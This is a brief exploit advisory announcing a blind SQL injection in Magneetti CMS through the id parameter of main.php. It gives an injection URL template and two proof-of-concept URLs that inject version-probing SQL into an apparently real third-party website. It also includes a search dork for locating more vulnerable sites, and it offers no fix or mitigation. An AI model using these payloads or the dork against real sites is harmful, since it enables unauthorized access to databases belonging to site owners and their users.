Magneetti CMS Blind SQL Injection Vuln


[o] Magneetti CMS Blind SQL Injection Vulnerability

Software : Magneetti CMS
Vendor : http://www.muuntamo.com/

Author : NoGe


[o] Vulnerable file
main.php


[o] Exploit
http://localhost/[path]/main.php?id=[SQL]


[o] Proof Of Concept
http://www.koiranenbros.net/main.php?id=27%20and%20substring(@@version,1,1)=5
http://www.koiranenbros.net/main.php?id=27%20and%20substring(@@version,1,1)=4


[o] Dork
"Powered by cifshanghai"


[o] Note
this is a private script